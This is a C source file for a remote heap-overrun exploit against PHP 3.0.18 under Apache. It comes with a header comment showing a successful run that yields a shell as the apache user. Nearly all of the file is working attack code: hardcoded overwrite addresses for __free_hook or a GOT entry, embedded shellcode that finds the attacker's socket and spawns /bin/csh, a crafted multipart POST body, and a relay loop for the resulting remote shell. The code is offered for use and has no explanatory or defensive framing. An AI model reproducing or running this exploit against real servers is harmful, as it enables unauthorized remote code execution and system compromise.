/*PHP 3.0.18 / heap overrun remote exploit
programmed by hsj  : 02.03.05

[hsj@trinity php]$ ./php3018_exp 192.168.0.3 80 /hoge.php
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
%id
uid=48(apache) gid=48(apache) groups=48(apache)
%

test on Red Hat Linux release 7.2 (Enigma) by xundi@xfocus.org
[root@test72 xundi]# uname -a
Linux test72 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
apache-1.3.23 + php-3.0.18,slight modify ;(
Thanks to maxi,dove. 
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>

#define LBUF_ADDR    0xbfffbdac    /* lbuf addr mean shellcode addr here*/
#if 1
#define REWRITE_ADDR 0x4024fa80   /* __free_hook addr */
#else
#define REWRITE_ADDR 0x40457f0c   /* GOT entry of free after libphp3.so relocating */
#endif
#define OFFSET       (544 - 16)   /* lbuf to sbuf header */
#define BUFLEN       1024

char shellcode[] =
"\xeb\x39\x5e\x8d\x46\x0c\x89\x46\x04\x89\xc7\x8d\x46\x1c\x89\x46"
"\x08\x31\xdb\xb3\x10\x89\x18\x31\xc9\xb1\xff\x31\xc0\x89\xca\x89"
"\x0e\xb0\x66\xb3\x07\x89\xf1\xcd\x80\x89\xd1\x85\xc0\x75\x08\x66"
"\x81\x7f\x02\x34\x12\x74\x06\xe2\xe2\xeb\x45\xeb\x4a\x89\xcb\x31"
"\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\xc7\x06\x2f"
"\x62\x69\x6e\xc7\x46\x04\x2f\x63\x73\x68\xc7\x46\x0c\x2d\x69\x41"
"\x41\x89\x76\x10\x8d\x46\x0c\x89\x46\x14\x8d\x4e\x10\x8d\x56\x18"
"\x31\xc0\x89\x02\x89\x46\x08\x88\x46\x0e\x89\xf3\xb0\x0b\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x76\xff\xff\xff";

int make_connection(char *address,int port)
{
    struct sockaddr_in server,target;
    struct hostent *host;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;
    memset((char *)&server,0,sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;

    if(bind(s,(struct sockaddr *)&server,sizeof(server))<0)
    {
        close(s);
        return -2;
    }

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==-1)
    {
        host = gethostbyname(address);
        if(host==0)
        {
            close(s);
            return -3;
        }
        memcpy(&(target.sin_addr),*(host->h_addr_list),host->h_length);
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = 30;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -4;
    }
    if(i==0)
    {
        close(s);
        return -5;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        errno = bf;
        return -6;
    }
    ioctl(s,FIONBIO,&bf);
    return s;
}

int sh(int in,int out,int s)
{
    char sbuf[128],rbuf[128];
    int i,ti,fd_cnt,ret=0,slen=0,rlen=0;
    fd_set rd,wr;

    fd_cnt = in > out ? in : out;
    fd_cnt = s > fd_cnt ? s : fd_cnt;
    fd_cnt++;
    for(;;)
    {
        FD_ZERO(&rd);
        if(rlen<sizeof(rbuf))
            FD_SET(s,&rd);
        if(slen<sizeof(sbuf))
            FD_SET(in,&rd);

        FD_ZERO(&wr);
        if(slen)
            FD_SET(s,&wr);
        if(rlen)
            FD_SET(out,&wr);

        if((ti=select(fd_cnt,&rd,&wr,0,0))==(-1))
            break;
        if(FD_ISSET(in,&rd))
        {
            if((i=read(in,(sbuf+slen),(sizeof(sbuf)-slen)))==(-1))
            {
                ret = -2;
                break;
            }
            else if(i==0)
            {
                ret = -3;
                break;
            }
            slen += i;
            if(!(--ti))
                continue;
        }
        if(FD_ISSET(s,&wr))
        {
            if((i=write(s,sbuf,slen))==(-1))
                break;
            if(i==slen)
                slen = 0;
            else
            {
                slen -= i;
                memmove(sbuf,sbuf+i,slen);
            }
            if(!(--ti))
                continue;
        }
        if(FD_ISSET(s,&rd))
        {
            if((i=read(s,(rbuf+rlen),(sizeof(rbuf)-rlen)))<=0)
                break;
            rlen += i;
            if(!(--ti))
                continue;
        }
        if(FD_ISSET(out,&wr))
        {
            if((i=write(out,rbuf,rlen))==(-1))
                break;
            if(i==rlen)
                rlen = 0;
            else
            {
                rlen -= i;
                memmove(rbuf,rbuf+i,rlen);
            }
        }
    }
    return ret;
}

int main(int argc,char *argv[])
{
    int sock,i,len,buflen;
    struct sockaddr_in si;
    char data[8192],buf[4096],buf2[2048];

    if(argc<4)
    {
        fprintf(stderr,"usage :$ %s server-address port-no php-path\n",argv[0]);
        exit(0);
    }

    sock = make_connection(argv[1],atoi(argv[2]));
    if(sock<0)
    {
        fprintf(stderr,"can not connect to %s.\n",argv[1]);
        exit(-1);
    }

    i = sizeof(struct sockaddr_in);
    if(getsockname(sock,(struct sockaddr *)&si,&i)==-1)
    {
        perror("getsockname");
        exit(-2);
    }
    shellcode[51]=(unsigned char)((si.sin_port>>0)&0xff);
    shellcode[52]=(unsigned char)((si.sin_port>>8)&0xff);

    for(i=0;i<sizeof(buf2);)
    {
        buf2[i++] = 0xeb;
        buf2[i++] = 0x04;
    }
    buf2[0] = 0xeb;
    buf2[1] = 0x06;
    *(unsigned int *)&buf2[OFFSET-6] = 0x41414141;
    buf2[OFFSET-2] = 0xeb;
    buf2[OFFSET-1] = 0x08;
    *(unsigned int *)&buf2[OFFSET+0] = LBUF_ADDR;
    *(unsigned int *)&buf2[OFFSET+4] = REWRITE_ADDR;
    *(unsigned int *)&buf2[BUFLEN-strlen(shellcode)-4] = 0x41414141;
    memcpy(buf2+BUFLEN-strlen(shellcode),shellcode,strlen(shellcode));
    buf2[BUFLEN] = 0;
    strcpy(buf,"--__THIS_IS_BOUNDARY__\r\n");
    strcat(buf,"Content-Disposition: form-data; name=\"");
    strcat(buf,buf2);
    strcat(buf,"[]\"; filename=\"hoge\";\r\n\r\nhoge\r\n");
    strcat(buf,"--__THIS_IS_BOUNDARY__\r\n");
    memset(buf2,0x41,sizeof(buf2));
    buf2[BUFLEN-512-1] = 0;
    strcat(buf,"Content-Disposition: form-data; name=\"");
    strcat(buf,buf2);
    strcat(buf,"\"; filename=\"fuga\";\r\n\r\nfuga\r\n");
    strcat(buf,"--__THIS_IS_BOUNDARY__\r\n");
    buflen = strlen(buf);

    /* nice! this is exploitable!!!1192 */
    len = sprintf(data,"POST %s HTTP/1.1\r\n"
                       "Content-Type: multipart/form-data; boundary=__THIS_IS_BOUNDARY__\r\n"
                       "Host: %s\r\n"
                       "Content-Length: %d\r\n\r\n%s",argv[3],argv[1],buflen,buf);
    write(sock,data,len);

    sh(0,1,sock);

    shutdown(sock,2);
    close(sock);

    return 0;
}